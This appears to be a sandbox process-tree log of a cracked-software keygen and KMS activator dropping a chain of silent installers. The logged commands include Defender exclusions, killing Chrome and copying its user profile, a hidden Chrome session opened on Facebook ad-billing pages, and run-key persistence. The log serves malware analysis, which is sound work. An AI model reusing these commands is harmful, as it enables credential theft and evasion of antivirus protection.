C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c taskkill /t /f /IM SppExtComObj.Exe2⤵
-
C:\Windows\system32\taskkill.exetaskkill /t /f /IM SppExtComObj.Exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\Users\Admin\AppData\Local\Temp\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjPatcher.exe"2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "C:\Windows\System32\SppExtComObjHook.dll"2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" stop KMSEmulator2⤵
-
C:\Windows\SysWOW64\sc.exe"sc.exe" delete KMSEmulator2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c reg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f2⤵
-
C:\Windows\system32\reg.exereg.exe DELETE HKLM\SYSTEM\CurrentControlSet\Services\KMSEmulator /f3⤵
- Modifies registry key
-
C:\Windows\System32\Netsh.exeC:\Windows\Sysnative\Netsh Advfirewall Firewall delete rule name="0pen Port KMS" protocol=TCP2⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\Sysnative\cmd.exe" /c rd "C:\ProgramData\KMSAuto" /S /Q2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\Sysnative\cmd.exe /D /c del /F /Q "kmsauto.ini"2⤵
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3f01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\KMSAuto\bin\KMSSS.exe"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP1⤵
- Executes dropped EXE
-
C:\ProgramData\KMSAuto\bin\KMSSS.exe"C:\ProgramData\KMSAuto\bin\KMSSS.exe" -Port 1688 -PWin RandomKMSPID -PO14 RandomKMSPID -PO15 RandomKMSPID -PO16 RandomKMSPID -AI 43200 -RI 43200 -Log -IP1⤵
- Executes dropped EXE
-
C:\Windows\system32\SppExtComObjPatcher.exeSppExtComObjPatcher.exe C:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=379cccfb-d4e0-48fe-b0f2-0136097be147;Action=CleanupState;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;Trigger=TimerEvent3⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"C:\Users\Admin\Desktop\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion\Stellar.Phoenix.Data.Recovery.serial.keygen.by.orion.exe"1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX4\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\Setup.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 36⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 1 3.1615300310.604786d6aa2e6 1016⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KCEIGP00AN\multitimer.exe" 2 3.1615300310.604786d6aa2e67⤵
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe" /Verysilent /subid=5778⤵
-
C:\Users\Admin\AppData\Local\Temp\is-5UQGA.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-5UQGA.tmp\Setup3310.tmp" /SL5="$403FE,802346,56832,C:\Users\Admin\AppData\Local\Temp\dhfyxcdte55\Setup3310.exe" /Verysilent /subid=5779⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe" /Verysilent10⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IP0FU.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-IP0FU.tmp\Setup.tmp" /SL5="$3047A,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-LLKSQ.tmp\Setup.exe" /Verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe" /Verysilent12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JFUDC.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-JFUDC.tmp\PictureLAb.tmp" /SL5="$207E2,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-FBOVI.tmp\PictureLAb.exe" /Verysilent13⤵
-
C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe" /VERYSILENT14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-9F7C4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-9F7C4.tmp\Setup.tmp" /SL5="$206C8,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-U1GG7.tmp\Setup.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PN4OB.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-PN4OB.tmp\def.exe" /S /UID=lab21416⤵
-
C:\Users\Admin\AppData\Local\Temp\38-bd5ef-f24-4499f-c975bfce88e02\Socekyqusa.exe"C:\Users\Admin\AppData\Local\Temp\38-bd5ef-f24-4499f-c975bfce88e02\Socekyqusa.exe"17⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exeC:\Users\Admin\AppData\Local\Temp\0y4rhd2k.c3n\customer4.exe19⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\1o3lkkfn.2ou\askinstall18.exe19⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe20⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe21⤵
- Kills process with taskkill
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\mzhrc0dc.hdl\md7_7dfj.exe19⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\22kngr0s.1dd\privacytools5.exe20⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\iqulossx.ej5\GcleanerWW.exe /mixone & exit18⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exe /8-2222 & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exeC:\Users\Admin\AppData\Local\Temp\bt4tg13y.s2d\setup.exe /8-222219⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Aged-Lake"20⤵
-
C:\Program Files (x86)\Aged-Lake\7za.exe"C:\Program Files (x86)\Aged-Lake\7za.exe" e -p154.61.71.13 winamp-plugins.7z20⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Aged-Lake\setup.exe" -map "C:\Program Files (x86)\Aged-Lake\WinmonProcessMonitor.sys""20⤵
-
C:\Program Files (x86)\Aged-Lake\setup.exe"C:\Program Files (x86)\Aged-Lake\setup.exe" -map "C:\Program Files (x86)\Aged-Lake\WinmonProcessMonitor.sys"21⤵
-
C:\Program Files (x86)\Aged-Lake\7za.exe"C:\Program Files (x86)\Aged-Lake\7za.exe" e -p154.61.71.13 winamp.7z20⤵
-
C:\Program Files (x86)\Aged-Lake\setup.exe"C:\Program Files (x86)\Aged-Lake\setup.exe" /8-222220⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exe & exit18⤵
-
C:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\anznxmu5.45t\MultitimerFour.exe19⤵
-
C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10420⤵
-
C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 1 3.1615300469.60478775cc348 10421⤵
-
C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ED19H9VC80\multitimer.exe" 2 3.1615300469.60478775cc34822⤵
-
C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe"C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe" /ustwo INSTALL23⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "snpopyfjw11.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\ya5ww53wwpn\snpopyfjw11.exe" & exit24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "snpopyfjw11.exe" /f25⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe" /Verysilent /subid=57723⤵
-
C:\Users\Admin\AppData\Local\Temp\is-145CE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-145CE.tmp\Setup3310.tmp" /SL5="$507CE,802346,56832,C:\Users\Admin\AppData\Local\Temp\o2eah5pnczl\Setup3310.exe" /Verysilent /subid=57724⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe" /Verysilent25⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UGM5K.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-UGM5K.tmp\Setup.tmp" /SL5="$50506,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-I9313.tmp\Setup.exe" /Verysilent26⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-7EAJE.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-7EAJE.tmp\PictureLAb.tmp" /SL5="$20950,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\PictureLAb.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D1FTF.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-D1FTF.tmp\Setup.tmp" /SL5="$506D4,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-572J0.tmp\Setup.exe" /VERYSILENT30⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1KPAO.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-1KPAO.tmp\def.exe" /S /UID=lab21431⤵
-
C:\Users\Admin\AppData\Local\Temp\48-c19d7-77b-a87b2-af6dc1c7df376\Cishihykagu.exe"C:\Users\Admin\AppData\Local\Temp\48-c19d7-77b-a87b2-af6dc1c7df376\Cishihykagu.exe"32⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exeC:\Users\Admin\AppData\Local\Temp\rxt5x0bw.sxh\customer4.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX6\main.exe"35⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\on22qgd3.3bg\askinstall18.exe34⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe35⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe36⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y35⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\g1yef2gy.bms\md7_7dfj.exe34⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\xzmn1det.yls\privacytools5.exe35⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\borenl0y.p12\GcleanerWW.exe /mixone & exit33⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exe /8-2222 & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exeC:\Users\Admin\AppData\Local\Temp\2a25pug4.b0q\setup.exe /8-222234⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Floral-Breeze"35⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exe & exit33⤵
-
C:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\gcswsnug.3kj\MultitimerFour.exe34⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2G893.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-2G893.tmp\Delta.tmp" /SL5="$60A78,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\Delta.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\is-JJ85M.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-JJ85M.tmp\Setup.exe" /VERYSILENT29⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe" /Verysilent27⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H9UE4.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-H9UE4.tmp\zznote.tmp" /SL5="$90802,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-IKSAQ.tmp\zznote.exe" /Verysilent28⤵
-
C:\Users\Admin\AppData\Local\Temp\5txl0paro5y\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\5txl0paro5y\askinstall24.exe"23⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/24⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xd4,0x88,0x7ffe9b2e6e00,0x7ffe9b2e6e10,0x7ffe9b2e6e2025⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1716 /prefetch:825⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1668 /prefetch:225⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2084 /prefetch:825⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2832 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3216 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1616 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4000 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3852 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3860 /prefetch:125⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4944 /prefetch:825⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1656,10973570353415048143,9126603679716639788,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4952 /prefetch:825⤵
-
C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe"C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe" /VERYSILENT /id=53523⤵
-
C:\Users\Admin\AppData\Local\Temp\is-LAIKG.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-LAIKG.tmp\vict.tmp" /SL5="$4044C,870426,780800,C:\Users\Admin\AppData\Local\Temp\clyd4rcs3kr\vict.exe" /VERYSILENT /id=53524⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F0TRN.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-F0TRN.tmp\wimapi.exe" 53525⤵
-
C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe" /VERYSILENT23⤵
-
C:\Users\Admin\AppData\Local\Temp\is-S9M39.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-S9M39.tmp\chashepro3.tmp" /SL5="$4089C,1478410,58368,C:\Users\Admin\AppData\Local\Temp\fuza45k1xup\chashepro3.exe" /VERYSILENT24⤵
-
